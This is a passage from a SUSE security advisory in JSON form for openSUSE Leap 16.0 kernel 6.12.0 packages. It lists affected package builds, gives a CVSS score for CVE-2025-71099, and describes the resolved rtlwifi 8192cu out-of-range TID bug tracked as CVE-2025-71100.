"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
